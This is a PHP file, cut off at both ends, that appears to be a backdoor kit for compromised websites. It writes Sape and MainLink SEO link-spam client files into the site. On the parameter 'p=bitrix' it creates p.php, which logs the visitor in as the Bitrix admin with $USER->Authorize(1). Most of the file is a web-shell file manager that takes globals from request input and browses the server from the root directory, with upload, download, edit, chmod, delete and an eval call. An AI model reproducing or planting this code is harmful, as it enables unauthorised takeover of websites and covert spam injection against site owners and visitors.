устарела if (!isset(\$this->_data['article']['date_updated']) OR \$this->_data['article']['date_updated'] < \$article_meta['date_updated']) { unlink(\$this->_get_db_file()); \$this->_load_data(); } } protected function _prepare_path_to_images() { \$this->_images_path = dirname(__FILE__) . '/images/'; if (!is_dir(\$this->_images_path)) { // Пытаемся создать папку. if (@mkdir(\$this->_images_path)) { @chmod(\$this->_images_path, 0777); // Права доступа } else { return \$this->_raise_error('Нет папки ' . \$this->_images_path . '. Создать не удалось. Выставите права 777 на папку.'); } } if (\$this->_multi_site) { \$this->_images_path .= \$this->_host . '.'; } return true; } /** * Создание папки для хранения изображений статьи * в режиме интеграции с CMS Wordpress * * @param \$article_id * @param \$upload_base_dir * * @return bool */ protected function _prepare_wp_path_to_images(\$article_id, \$upload_base_dir) { \$this->_images_path = \$upload_base_dir . '/' . (int)\$article_id . '/'; if (!is_dir(\$this->_images_path)) { // Пытаемся создать папку. if (@mkdir(\$this->_images_path)) { @chmod(\$this->_images_path, 0777); // Права доступа } else { return \$this->_raise_error('Нет папки ' . \$this->_images_path . '. Создать не удалось. Выставите права 777 на папку.'); } } return true; } protected function _return_image() { \$this->_set_request_mode('image'); \$this->_prepare_path_to_images(); //Проверим загружена ли картинка \$image_meta = \$this->_data['index']['images'][\$this->_request_uri]; \$image_path = \$this->_images_path . \$image_meta['id'] . '.' . \$image_meta['ext']; if (!is_file(\$image_path) or filemtime(\$image_path) != \$image_meta['date_updated']) { // Чтобы не повесить площадку клиента и чтобы не было одновременных запросов @touch(\$image_path, \$image_meta['date_updated']); \$path = \$image_meta['dispenser_path']; foreach (\$this->_server_list as \$server) { if (\$data = \$this->_fetch_remote_file(\$server, \$path)) { if (substr(\$data, 0, 12) == 'FATAL ERROR:') { \$this->_raise_error(\$data); } else { // [псевдо]проверка целостности: if (strlen(\$data) > 0) { \$this->_write(\$image_path, \$data); break; } } } } @touch(\$image_path, \$image_meta['date_updated']); } unset(\$data); if (!is_file(\$image_path)) { return \$this->_return_not_found(); } \$image_file_meta = @getimagesize(\$image_path); \$content_type = isset(\$image_file_meta['mime']) ? \$image_file_meta['mime'] : 'image'; if (\$this->_headers_enabled) { header('Content-Type: ' . \$content_type); } return \$this->_read(\$image_path); } /** * Загрузка изображения статьи в режиме * интеграции с CMS Wordpress * * @param \$image_uri * @param \$article_id * @param \$upload_base_dir */ protected function _load_wp_image(\$image_uri, \$article_id, \$upload_base_dir) { \$this->_request_uri = \$image_uri; \$this->_set_request_mode('image'); \$this->_prepare_wp_path_to_images(\$article_id, \$upload_base_dir); //Проверим загружена ли картинка \$image_meta = \$this->_data['index']['images'][\$this->_request_uri]; \$image_path = \$this->_images_path . \$image_meta['filename']; if (!is_file(\$image_path) || filemtime(\$image_path) != \$image_meta['date_updated']) { // Чтобы не повесить площадку клиента и чтобы не было одновременных запросов @touch(\$image_path, \$image_meta['date_updated']); \$path = \$image_meta['dispenser_path']; foreach (\$this->_server_list as \$server) { if (\$data = \$this->_fetch_remote_file(\$server, \$path)) { if (substr(\$data, 0, 12) == 'FATAL ERROR:') { \$this->_raise_error(\$data); } else { // [псевдо]проверка целостности: if (strlen(\$data) > 0) { \$this->_write(\$image_path, \$data); break; } } } } @touch(\$image_path, \$image_meta['date_updated']); } } protected function _fetch_article(\$template) { if (strlen(\$this->_charset)) { \$template = str_replace('{meta_charset}', \$this->_charset, \$template); } foreach (\$this->_data['index']['template_fields'] as \$field) { if (isset(\$this->_data['article'][\$field])) { \$template = str_replace('{' . \$field . '}', \$this->_data['article'][\$field], \$template); } else { \$template = str_replace('{' . \$field . '}', '', \$template); } } return (\$template); } protected function _get_template(\$template_url, \$templateId) { //Загрузим индекс если есть \$this->_save_file_name = 'tpl.articles.db'; \$index_file = \$this->_get_db_file(); if (file_exists(\$index_file)) { \$this->_data['templates'] = unserialize(\$this->_read(\$index_file)); } //Если шаблон не найден или устарел в индексе, обновим его if (!isset(\$this->_data['templates'][\$template_url]) or (time() - \$this->_data['templates'][\$template_url]['date_updated']) > \$this->_data['index']['templates'][\$templateId]['lifetime'] ) { \$this->_refresh_template(\$template_url, \$index_file); } //Если шаблон не обнаружен - ошибка if (!isset(\$this->_data['templates'][\$template_url])) { if (\$this->_template_error) { return \$this->_raise_error(\$this->_template_error); } return \$this->_raise_error('Не найден шаблон для статьи'); } return \$this->_data['templates'][\$template_url]['body']; } protected function _refresh_template(\$template_url, \$index_file) { \$parseUrl = parse_url(\$template_url); \$download_url = ''; if (\$parseUrl['path']) { \$download_url .= \$parseUrl['path']; } if (isset(\$parseUrl['query'])) { \$download_url .= '?' . \$parseUrl['query']; } \$template_body = \$this->_fetch_remote_file(\$this->_real_host, \$download_url, true); //проверим его на корректность if (!\$this->_is_valid_template(\$template_body)) { return false; } \$template_body = \$this->_cut_template_links(\$template_body); //Запишем его вместе с другими в кэш \$this->_data['templates'][\$template_url] = array('body' => \$template_body, 'date_updated' => time()); //И сохраним кэш \$this->_write(\$index_file, serialize(\$this->_data['templates'])); return true; } public function _fill_mask(\$data) { global \$unnecessary; \$len = strlen(\$data[0]); \$mask = str_repeat(\$this->_mask_code, \$len); \$unnecessary[\$this->_mask_code][] = array( 'mask' => \$mask, 'code' => \$data[0], 'len' => \$len ); return \$mask; } protected function _cut_unnecessary(&\$contents, \$code, \$mask) { global \$unnecessary; \$this->_mask_code = \$code; \$_unnecessary[\$this->_mask_code] = array(); \$contents = preg_replace_callback(\$mask, array(\$this, '_fill_mask'), \$contents); } protected function _restore_unnecessary(&\$contents, \$code) { global \$unnecessary; \$offset = 0; if (!empty(\$unnecessary[\$code])) { foreach (\$unnecessary[\$code] as \$meta) { \$offset = strpos(\$contents, \$meta['mask'], \$offset); \$contents = substr(\$contents, 0, \$offset) . \$meta['code'] . substr(\$contents, \$offset + \$meta['len']); } } } protected function _cut_template_links(\$template_body) { if (function_exists('mb_internal_encoding') && strlen(\$this->_charset) > 0) { mb_internal_encoding(\$this->_charset); } \$link_pattern = '~(\<a [^\>]*?href[^\>]*?\=["\']{0,1}http[^\>]*?\>.*?\</a[^\>]*?\>|\<a [^\>]*?href[^\>]*?\=["\']{0,1}http[^\>]*?\>|\<area [^\>]*?href[^\>]*?\=["\']{0,1}http[^\>]*?\>)~si'; \$link_subpattern = '~\<a |\<area ~si'; \$rel_pattern = '~[\s]{1}rel\=["\']{1}[^ "\'\>]*?["\']{1}| rel\=[^ "\'\>]*?[\s]{1}~si'; \$href_pattern = '~[\s]{1}href\=["\']{0,1}(http[^ "\'\>]*)?["\']{0,1} {0,1}~si'; \$allowed_domains = \$this->_data['index']['ext_links_allowed']; \$allowed_domains[] = \$this->_host; \$allowed_domains[] = 'www.' . \$this->_host; \$this->_cut_unnecessary(\$template_body, 'C', '|<!--(.*?)-->|smi'); \$this->_cut_unnecessary(\$template_body, 'S', '|<script[^>]*>.*?</script>|si'); \$this->_cut_unnecessary(\$template_body, 'N', '|<noindex[^>]*>.*?</noindex>|si'); \$slices = preg_split(\$link_pattern, \$template_body, -1, PREG_SPLIT_DELIM_CAPTURE); //Обрамляем все видимые ссылки в noindex if (is_array(\$slices)) { foreach (\$slices as \$id => \$link) { if (\$id % 2 == 0) { continue; } if (preg_match(\$href_pattern, \$link, \$urls)) { \$parsed_url = @parse_url(\$urls[1]); \$host = isset(\$parsed_url['host']) ? \$parsed_url['host'] : false; if (!in_array(\$host, \$allowed_domains) || !\$host) { //Обрамляем в тэги noindex \$slices[\$id] = '<noindex>' . \$slices[\$id] . '</noindex>'; } } } \$template_body = implode('', \$slices); } //Вновь отображаем содержимое внутри noindex \$this->_restore_unnecessary(\$template_body, 'N'); //Прописываем всем ссылкам nofollow \$slices = preg_split(\$link_pattern, \$template_body, -1, PREG_SPLIT_DELIM_CAPTURE); if (is_array(\$slices)) { foreach (\$slices as \$id => \$link) { if (\$id % 2 == 0) { continue; } if (preg_match(\$href_pattern, \$link, \$urls)) { \$parsed_url = @parse_url(\$urls[1]); \$host = isset(\$parsed_url['host']) ? \$parsed_url['host'] : false; if (!in_array(\$host, \$allowed_domains) || !\$host) { //вырезаем REL \$slices[\$id] = preg_replace(\$rel_pattern, '', \$link); //Добавляем rel=nofollow \$slices[\$id] = preg_replace(\$link_subpattern, '\$0rel="nofollow" ', \$slices[\$id]); } } } \$template_body = implode('', \$slices); } \$this->_restore_unnecessary(\$template_body, 'S'); \$this->_restore_unnecessary(\$template_body, 'C'); return \$template_body; } protected function _is_valid_template(\$template_body) { foreach (\$this->_data['index']['template_required_fields'] as \$field) { if (strpos(\$template_body, '{' . \$field . '}') === false) { \$this->_template_error = 'В шаблоне не хватает поля ' . \$field . '.'; return false; } } return true; } protected function _return_html(\$html) { if (\$this->_headers_enabled) { header('HTTP/1.x 200 OK'); if (!empty(\$this->_charset)) { header('Content-Type: text/html; charset=' . \$this->_charset); } } return \$html; } protected function _return_not_found() { header('HTTP/1.x 404 Not Found'); } protected function _get_dispenser_path() { switch (\$this->_request_mode) { case 'index': return '/?user=' . _SAPE_USER . '&host=' . \$this->_host . '&rtype=' . \$this->_request_mode; break; case 'article': return '/?user=' . _SAPE_USER . '&host=' . \$this->_host . '&rtype=' . \$this->_request_mode . '&artid=' . \$this->_article_id; break; case 'image': return \$this->image_url; break; } } protected function _set_request_mode(\$mode) { \$this->_request_mode = \$mode; } protected function _get_db_file() { if (\$this->_multi_site) { return dirname(__FILE__) . '/' . \$this->_host . '.' . \$this->_save_file_name; } else { return dirname(__FILE__) . '/' . \$this->_save_file_name; } } protected function _set_data(\$data) { \$this->_data[\$this->_request_mode] = \$data; //Есть ли обязательный вывод if (isset(\$data['__sape_page_obligatory_output__'])) { \$this->_page_obligatory_output = \$data['__sape_page_obligatory_output__']; } } /** * Загрузка данных WordPress */ protected function _load_wp_data() { \$this->_db_file = dirname(__FILE__) . '/' . \$this->_host . '.' . \$this->_save_file_name; if (!file_exists(\$this->_db_file)) { // Пытаемся создать файл. if (@touch(\$this->_db_file)) { @chmod(\$this->_db_file, 0666); // Права доступа } else { return \$this->_raise_error('Нет файла ' . \$this->_db_file . '. Создать не удалось. Выставите права 777 на папку.'); } \$this->_write(\$this->_db_file, serialize(array())); } if (!is_writable(\$this->_db_file)) { return \$this->_raise_error('Нет доступа на запись к файлу: ' . \$this->_db_file . '! Выставите права 777 на папку.'); } @clearstatcache(); \$data = \$this->_read(\$this->_db_file); \$data = \$this->_uncode_data(\$data); \$this->_set_data(\$data); return true; } protected function _get_meta_file() { return \$this->_get_db_file(); } } /** * Класс для работы клиентским кодом rtb.sape.ru */ class SAPE_rtb extends SAPE_base { protected \$_site_id = null; protected \$_ucode_id = null; protected \$_ucode_url = null; protected \$_ucode_filename = null; protected \$_ucode_places = array(); protected \$_base_dir = null; protected \$_base_url = '/'; protected \$_proxy_url = null; protected \$_data = null; protected \$_filename = null; protected \$_server_list = array('rtb.sape.ru'); protected \$_format = false; protected \$_split_data_file = false; protected \$_return_script_shown = false; /** * SAPE_rtb constructor. * * @param array \$options */ public function __construct(\$options = null) { if (isset(\$options['host'])) { \$this->_host = \$options['host']; } else { \$this->_host = \$_SERVER['HTTP_HOST']; \$this->_host = preg_replace('/^http(?:s)?:\/\//', '', \$this->_host); \$this->_host = preg_replace('/^www\./', '', \$this->_host); } if (isset(\$options['ucode_id'])) { \$this->_ucode_id = \$options['ucode_id']; if (isset(\$options['ucode_filename'])) { \$this->_filename = preg_replace('~\.js\$~', '', trim(\$options['ucode_filename'])) . '.js'; } else { \$this->_filename = \$this->_ucode_id . '.js'; } if (isset(\$options['filename'])) { \$this->_ucode_filename = preg_replace('~\.js\$~', '', trim(\$options['filename'])) . '.js'; } if (isset(\$options['places'])) { \$this->_ucode_places = \$options['places']; } } elseif (isset(\$options['site_id'])) { \$this->_site_id = \$options['site_id']; if (isset(\$options['filename']) && \$options['filename']) { \$this->_filename = preg_replace('~\.js\$~', '', trim(\$options['filename'])) . '.js'; } else { \$this->_filename = \$this->_site_id . '.js'; } } if (\$this->_filename !== null) { if (isset(\$options['base_dir'])) { \$this->_base_dir = preg_replace('~/\$~', '', trim(\$options['base_dir'])) . '/'; } else { \$this->_base_dir = dirname(dirname(__FILE__)) . '/'; } if (isset(\$options['base_url'])) { \$this->_base_url = preg_replace('~/\$~', '', trim(\$options['base_url'])) . '/'; } if (isset(\$options['proxy_url'])) { \$this->_proxy_url = strpos(\$options['proxy_url'], '?') === false ? (\$options['proxy_url'] . '?') : (preg_replace('~&^~', '', '&' . \$options['proxy_url'] . '&')); } else { \$this->_proxy_url = '/proxy.php?'; } \$this->_load_data(); } else { \$this->_load_proxed_url(); } } /** * Получить имя файла с даными * * @return string */ protected function _get_db_file() { if (\$this->_ucode_id) { return dirname(__FILE__) . '/rtb.ucode.' . \$this->_ucode_id . '.' . \$this->_host . '.db'; } return dirname(__FILE__) . '/rtb.site.' . \$this->_site_id . '.' . \$this->_host . '.db'; } /** * Получить URI к хосту диспенсера * * @return string */ protected function _get_dispenser_path() { if (\$this->_ucode_id) { return '/dispenser/user/' . _SAPE_USER . '/' . \$this->_ucode_id; } return '/dispenser/site/' . _SAPE_USER . '/' . \$this->_site_id; } /** * @return bool */ protected function _load_proxed_url() { \$db_file = dirname(__FILE__) . '/rtb.proxy.db'; if (!is_file(\$db_file)) { if (@touch(\$db_file)) { @chmod(\$db_file, 0666); // Права доступа } else { return \$this->_raise_error('Нет файла ' . \$db_file . '. Создать не удалось. Выставите права 777 на папку.'); } } if (!is_writable(\$db_file)) { return \$this->_raise_error('Нет доступа на запись к файлу: ' . \$db_file . '! Выставите права 777 на папку.'); } @clearstatcache(); \$data = \$this->_read(\$db_file); if (\$data !== '') { \$this->_data['__proxy__'] = \$this->_uncode_data(\$data); } return true; } /** * Сохранение данных в файл. * * @param string \$data * @param string \$filename */ protected function _save_data(\$data, \$filename = '') { \$hash = \$this->_uncode_data(\$data); if (isset(\$hash['__code__']) && !empty(\$hash['__code__'])) { \$this->_save_data_js(\$hash); } parent::_save_data(\$data, \$filename); } /** * Сохранение данных в js файл. * * @param array \$data */ protected function _save_data_js(\$data) { \$code = null; if (\$this->_ucode_id) { if (!empty(\$data['__sites__'])) { \$key = crc32(\$this->_host) . crc32(strrev(\$this->_host)); if (isset(\$data['__sites__'][\$key])) { \$script = new SAPE_rtb(array('site_id' => \$data['__sites__'][\$key], 'base_dir' => \$this->_base_dir, 'filename' => \$this->_ucode_filename)); \$script = \$script->return_script_url(); if (!empty(\$script)) { \$code = '(function(w,n,m){w[n]=' . json_encode(\$this->_proxy_url) . ';w[m]=' . json_encode(\$script) . ';})(window,"srtb_proxy","srtb_proxy_site");' . \$data['__code__']; } } } } if (\$code === null) { \$code = '(function(w,n){w[n]=' . json_encode(\$this->_proxy_url) . ';})(window,"srtb_proxy");' . \$data['__code__']; } \$this->_write(\$this->_base_dir . \$this->_filename, \$code); \$this->_write(dirname(__FILE__) . '/rtb.proxy.db', \$this->_code_data(\$data['__proxy__'])); } /** * Сохранить данные, полученные из файла, в объекте * * @param array \$data */ protected function _set_data(\$data) { \$this->_data = \$data; } /** * @return string */ protected function return_script_url() { return '//' . \$this->_host . \$this->_base_url . \$this->_filename . '?t=' . filemtime(\$this->_db_file); } /** * @return string */ public function return_script() { if (\$this->_return_script_shown === false && !empty(\$this->_data) && !empty(\$this->_data['__code__'])) { \$this->_return_script_shown = true; \$js = \$this->_base_dir . \$this->_filename; if (!(file_exists(\$js) && is_file(\$js))) { \$this->_save_data_js(\$this->_data); } if (\$this->_ucode_places) { \$params = ''; foreach (\$this->_ucode_places as \$place) { \$params .= 'w[n].push(' . json_encode(\$place) . ');'; } return '<script type="text/javascript">(function(w,d,n){w[n]=w[n]||[];' . \$params . '})(window,document,"srtb_places");</script><script type="text/javascript" src="' . \$this->return_script_url() . '" async="async"></script>'; } return '<script type="text/javascript" src="' . \$this->return_script_url() . '" async="async"></script>'; } return ''; } /** * @param integer \$block_id * * @return string */ public function return_block(\$block_id) { if (\$this->_site_id && isset(\$this->_data['__ads__'][\$block_id])) { return '<!-- SAPE RTB DIV ' . \$this->_data['__ads__'][\$block_id]['w'] . 'x' . \$this->_data['__ads__'][\$block_id]['h'] . ' --><div id="SRTB_' . (int)\$block_id . '"></div><!-- SAPE RTB END -->'; } return ''; } /** * @param array \$options * * @return string */ public function return_ucode(\$options) { if (\$this->_ucode_id) { \$params = ''; foreach (\$options as \$key => \$val) { \$params .= ' data-ad-' . \$key . '="' . htmlspecialchars(\$val, ENT_QUOTES) . '"'; } return '<div class="srtb-tag-' . \$this->_ucode_id . '" style="display:inline-block;"' . \$params . '></div>'; } return ''; } /** * @return bool */ public function process_request() { if (isset(\$_GET['q']) && !empty(\$this->_data['__proxy__'])) { \$url = @base64_decode(\$_GET['q']); if (\$url !== false) { \$test = false; \$prefix = preg_replace('~^(?:https?:)//~', '', \$url); foreach (\$this->_data['__proxy__'] as \$u) { if (strpos(\$u, \$prefix) !== 0) { \$test = true; break; } } if (\$test === false) { \$url = false; } } if (\$url !== false) { if (strpos(\$url, '//') === 0) { \$url = 'http:' . \$url; } if (\$ch = @curl_init()) { \$headers = array(); if (function_exists('getallheaders')) { \$headers = getallheaders(); } else { foreach (\$_SERVER as \$name => \$value) { if (substr(\$name, 0, 5) == 'HTTP_') { \$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr(\$name, 5)))))] = \$value; } } } @curl_setopt(\$ch, CURLOPT_URL, \$url); @curl_setopt(\$ch, CURLOPT_HEADER, true); @curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true); @curl_setopt(\$ch, CURLOPT_CONNECTTIMEOUT, \$this->_socket_timeout); @curl_setopt(\$ch, CURLOPT_USERAGENT, isset(\$headers['User-Agent']) ? \$headers['User-Agent'] : (isset(\$_SERVER['HTTP_USER_AGENT']) ? \$_SERVER['HTTP_USER_AGENT'] : '')); @curl_setopt(\$ch, CURLOPT_HTTPHEADER, \$headers); \$data = @curl_exec(\$ch); \$headerSize = curl_getinfo(\$ch, CURLINFO_HEADER_SIZE); \$headerText = substr(\$data, 0, \$headerSize); \$data = substr(\$data, \$headerSize); @curl_close(\$ch); foreach (explode("\r\n", \$headerText) as \$i => \$line) { if (\$line) { header(\$line); } } echo \$data; } return true; } } header('HTTP/1.x 404 Not Found'); return false; } } LABEL; file_put_contents('err_class/sape.php', $sape_file); file_put_contents('err_class/mainlink.php', $ml_file); file_put_contents('err_class/data/ML_lcode.php', $ml_file2); } if (isset($_GET['p']) && ($_GET['p']) == 'bitrix') { if (!file_exists("p.php")) file_put_contents('p.php', '<?php require($_SERVER["DOCUMENT_ROOT"] . "/bitrix/header.php"); global $USER; $one = 1; $USER->Authorize($one); LocalRedirect("/?bitrix_include_areas=Y"); require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");?>'); header('Location: p.php'); } if(!isset($_SERVER['PATH_INFO']) && isset($_SERVER["ORIG_PATH_INFO"])) { $_SERVER["PATH_INFO"] = $_SERVER["ORIG_PATH_INFO"]; } if(!isset($_SERVER['DOCUMENT_ROOT'])) { if ( isset($_SERVER['SCRIPT_FILENAME']) ) $path = $_SERVER['SCRIPT_FILENAME']; elseif ( isset($_SERVER['PATH_TRANSLATED']) ) $path = str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']); $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($path, 0, 0-strlen($_SERVER['PHP_SELF']))); } // Register Globals (its an old script..) $blockKeys = array('_SERVER','_SESSION','_GET','_POST','_COOKIE'); foreach ($_GET as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val; foreach ($_POST as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val; foreach ($_COOKIE as $key => $val) if (array_search($key,$blockKeys) === false) $$key=$val; // PHP_VERSION_ID is available as of PHP 5.2.7, if our version is lower than that, then emulate it $is_windows = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'); function getServerURL() { $url = ($_SERVER["HTTPS"] == "on")?"https://":"http://"; $url .= $_SERVER["SERVER_NAME"]; // vari??vel do servidor, $_SERVER["HTTP_HOST"] ?? equivalente if ($_SERVER["SERVER_PORT"] != "80" && $_SERVER["SERVER_PORT"] != "443") $url .= ":".$_SERVER["SERVER_PORT"]; return $url; } function getCompleteURL() { return getServerURL().$_SERVER["REQUEST_URI"]; } $url = @getCompleteURL(); $url_info = parse_url($url); $doc_root = rtrim(str_replace(DIRECTORY_SEPARATOR,'/',$_SERVER["DOCUMENT_ROOT"]),'/'); // ex: 'C:/htdocs' $url_root = rtrim(@getServerURL(),'/'); // ex. 'http://www.site.com' $fm_file = $doc_root.$_SERVER["PHP_SELF"]; // could use __FILE__ $fm_url = $url_root.$_SERVER["PHP_SELF"]; $fm_path_info = pathinfo($fm_file); $open_basedir_ini = trim(str_replace(DIRECTORY_SEPARATOR,'/',@ini_get("open_basedir"))); $open_basedirs = array(); if (strlen($open_basedir_ini)) { $dirs = array($open_basedir_ini); if ($is_windows) { if (strpos($open_basedir_ini,';') !== false) { $dirs = explode(';',$open_basedir_ini); } $dirs = array_map('ucfirst',$dirs); } else { if (strpos($open_basedir_ini,':') !== false) { $dirs = explode(':',$open_basedir_ini); } } foreach ($dirs as $dir) { $dir = rtrim($dir,"/")."/"; // fm_root must have trailing slash if (is_dir($dir)) $open_basedirs[] = $dir; } } if (!function_exists('mb_strtoupper')) { die('PHP File Manager<br>Error: Please enable "mbstring" php module.'); } $charset = "UTF-8"; $quota_mb = 0; $upload_ext_filter = array(); $download_ext_filter = array(); $cookie_cache_time = 60*60*24*30; // 30 Days //@setlocale(LC_CTYPE, 'C'); //@ini_set('default_charset', $charset); if (!isset($fm_current_root)) { if ($is_windows) { if (strpos($doc_root,":") !== false) $fm_current_root = ucfirst(substr($doc_root,0,strpos($doc_root,":")+1)."/"); // If doc_root has ":" take the drive letter $fm_current_root = ucfirst($doc_root."/"); } else { $fm_current_root = "/"; // Linux default show root } } else { if ($is_windows) $fm_current_root = ucfirst($fm_current_root); } if (count($open_basedirs)){ $fm_current_root_ok = false; foreach ($open_basedirs as $open_basedir) { if (strpos($fm_current_root,$open_basedir) !== false) { $fm_current_root_ok = true; break; } } if (!$fm_current_root_ok) { $fm_current_root = $open_basedirs[0]; } } if (!isset($fm_current_dir)){ $fm_path = rtrim($fm_path_info["dirname"],"/")."/"; if (strpos($fm_path,$fm_current_root) !== false) { $fm_current_dir = $fm_path; } else { $fm_current_dir = $fm_current_root; } if ($is_windows) $fm_current_dir = ucfirst($fm_current_dir); } $fm_current_root = rtrim($fm_current_root,"/")."/"; // Must have trailing slash $fm_current_dir = rtrim($fm_current_dir,"/")."/"; // Must have trailing slash if (!isset($resolve_ids)){ setcookie("resolve_ids", 0, time()+$cookie_cache_time, "/"); } elseif (isset($set_resolve_ids)){ $resolve_ids=($resolve_ids)?0:1; setcookie("resolve_ids", $resolve_ids, time()+$cookie_cache_time, "/"); } if ($resolve_ids){ setcookie("resolve_ids", 0, time()+$cookie_cache_time, "/"); } $fm_color = array(); $fm_color['Bg'] = "EEEEEE"; $fm_color['Text'] = "000000"; $fm_color['Link'] = "0A77F7"; $fm_color['Entry'] = "FFFFFF"; $fm_color['Over'] = "C0EBFD"; $fm_color['Mark'] = "A7D2E4"; // +-------------------------------------------------- // | File Manager Actions // +-------------------------------------------------- if (!isset($frame)) { $frame = 0; } if (!isset($action)) { $action = 0; } switch ($frame){ case 1: break; // Empty Frame case 2: frame2(); break; case 3: frame3(); break; default: switch($action){ case 3: download(); break; case 4: view_form(); break; case 5: server_info_form(); break; case 6: break; case 7: edit_file_form(); break; case 8: chmod_form(); break; case 10: upload_form(); break; default: frameset(); } } // +-------------------------------------------------- // | File System // +-------------------------------------------------- function total_size($arg) { $total = 0; if (file_exists($arg)) { if (is_dir($arg)) { $handle = opendir(fs_encode($arg)); while($aux = readdir($handle)) { if ($aux != "." && $aux != "..") $total += total_size($arg."/".$aux); } @closedir($handle); } else $total = filesize($arg); } return $total; } function total_delete($arg) { if (file_exists($arg)) { @chmod($arg,0755); if (is_dir($arg)) { $handle = opendir(fs_encode($arg)); while($aux = readdir($handle)) { if ($aux != "." && $aux != "..") total_delete($arg."/".$aux); } @closedir($handle); rmdir($arg); } else unlink($arg); } } function download(){ global $fm_current_dir,$filename; $download_ext_filter = array(); $file = $fm_current_dir.$filename; if(file_exists($file)){ $is_denied = false; foreach($download_ext_filter as $key=>$ext){ if (eregi($ext,$filename)){ $is_denied = true; break; } } if (!$is_denied){ $size = filesize($file); header("Content-Type: application/save"); header("Content-Length: $size"); header("Content-Disposition: attachment; filename=\"$filename\""); header("Content-Transfer-Encoding: binary"); if ($fh = fopen("$file", "rb")){ fpassthru($fh); fclose($fh); } else alert(et('ReadDenied').": ".$file); } else alert(et('ReadDenied').": ".$file); } else alert(et('FileNotFound').": ".$file); } function save_upload($temp_file,$filename,$dir_dest) { global $upload_ext_filter; $file = $dir_dest.$filename; $filesize = filesize($temp_file); $is_denied = false; foreach($upload_ext_filter as $key=>$ext){ if (eregi($ext,$filename)){ $is_denied = true; break; } } if (!$is_denied){ if (!check_limit($filesize)){ if (file_exists($file)){ if (unlink($file)){ if (copy($temp_file,$file)){ @chmod($file,0755); $out = 6; } else $out = 2; } else $out = 5; } else { if (copy($temp_file,$file)){ @chmod($file,0755); $out = 1; } else $out = 2; } } else $out = 3; } else $out = 4; return $out; } // +-------------------------------------------------- // | Data Formating // +-------------------------------------------------- function formatsize($arg) { if ($arg>0){ $j = 0; $ext = array(" bytes"," Kb"," Mb"," Gb"," Tb"); while ($arg >= pow(1024,$j)) ++$j; { $arg = (round($arg/pow(1024,$j-1)*100)/100).($ext[$j-1]); } return $arg; } else return "0 Kb"; } function rep($x,$y){ if ($x) { $aux = ""; for ($a=1;$a<=$x;$a++) $aux .= $y; return $aux; } else return ""; } function str_zero($arg1,$arg2){ if (strstr($arg1,"-") == false){ $aux = intval($arg2) - strlen($arg1); if ($aux) return rep($aux,"0").$arg1; else return $arg1; } else { return "[$arg1]"; } } function replace_double($sub,$str){ $out=str_replace($sub.$sub,$sub,$str); while ( strlen($out) != strlen($str) ){ $str=$out; $out=str_replace($sub.$sub,$sub,$str); } return $out; } function array_csort() { $args = func_get_args(); $marray = array_shift($args); $msortline = "return(array_multisort("; $i = 0; foreach ($args as $arg) { $i++; if (is_string($arg)) { foreach ($marray as $row) { $sortarr[$i][] = $row[$arg]; } } else { $sortarr[$i] = $arg; } $msortline .= "\$sortarr[".$i."],"; } $msortline .= "\$marray));"; eval($msortline); return $marray; } function show_perms( $P ) { $sP = "<b>"; if($P & 0x1000) $sP .= 'p'; // FIFO pipe elseif($P & 0x2000) $sP .= 'c'; // Character special elseif($P & 0x4000) $sP .= 'd'; // Directory elseif($P & 0x6000) $sP .= 'b'; // Block special elseif($P & 0x8000) $sP .= '−'; // Regular elseif($P & 0xA000) $sP .= 'l'; // Symbolic Link elseif($P & 0xC000) $sP .= 's'; // Socket else $sP .= 'u'; // UNKNOWN $sP .= "</b>"; // owner - group - others $sP .= (($P & 0x0100) ? 'r' : '−') . (($P & 0x0080) ? 'w' : '−') . (($P & 0x0040) ? (($P & 0x0800) ? 's' : 'x' ) : (($P & 0x0800) ? 'S' : '−')); $sP .= (($P & 0x0020) ? 'r' : '−') . (($P & 0x0010) ? 'w' : '−') . (($P & 0x0008) ? (($P & 0x0400) ? 's' : 'x' ) : (($P & 0x0400) ? 'S' : '−')); $sP .= (($P & 0x0004) ? 'r' : '−') . (($P & 0x0002) ? 'w' : '−') . (($P & 0x0001) ? (($P & 0x0200) ? 't' : 'x' ) : (($P & 0x0200) ? 'T' : '−')); return $sP; } function format_size($arg) { if ($arg>0){ $j = 0; $ext = array(" bytes"," Kb"," Mb"," Gb"," Tb"); while ($arg >= pow(1024,$j)) ++$j; return round($arg / pow(1024,$j-1) * 100) / 100 . $ext[$j-1]; } else return "0 bytes"; } function get_size($file) { return format_size(filesize($file)); } function check_limit($new_filesize=0) { global $fm_current_root; global $quota_mb; if($quota_mb){ $total = total_size($fm_current_root); if (floor(($total+$new_filesize)/(1024*1024)) > $quota_mb) return true; } return false; } function get_user($arg) { global $mat_passwd; $aux = "x:".trim($arg).":"; for($x=0;$x<count($mat_passwd);$x++){ if (strstr($mat_passwd[$x],$aux)){ $mat = explode(":",$mat_passwd[$x]); return $mat[0]; } } return $arg; } function get_group($arg) { global $mat_group; $aux = "x:".trim($arg).":"; for($x=0;$x<count($mat_group);$x++){ if (strstr($mat_group[$x],$aux)){ $mat = explode(":",$mat_group[$x]); return $mat[0]; } } return $arg; } function uppercase($str){ global $charset; return mb_strtoupper($str, $charset); } function lowercase($str){ global $charset; return mb_strtolower($str, $charset); } // +-------------------------------------------------- // | Interface // +-------------------------------------------------- function html_header($header=""){ global $charset,$fm_color; echo " <!DOCTYPE HTML PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"> <head> <title>...::::FM</title> <script language=\"Javascript\" type=\"text/javascript\"> <!-- function Is(){ this.appname = navigator.appName; this.appversion = navigator.appVersion; this.platform = navigator.platform; this.useragent = navigator.userAgent.toLowerCase(); this.ie = ( this.appname == 'Microsoft Internet Explorer' ); if (( this.useragent.indexOf( 'mac' ) != -1 ) || ( this.platform.indexOf( 'mac' ) != -1 )){ this.sisop = 'mac'; } else if (( this.useragent.indexOf( 'windows' ) != -1 ) || ( this.platform.indexOf( 'win32' ) != -1 )){ this.sisop = 'windows'; } else if (( this.useragent.indexOf( 'inux' ) != -1 ) || ( this.platform.indexOf( 'linux' ) != -1 )){ this.sisop = 'linux'; } } var is = new Is(); function enterSubmit(keypressEvent,submitFunc){ var kCode = (is.ie) ? 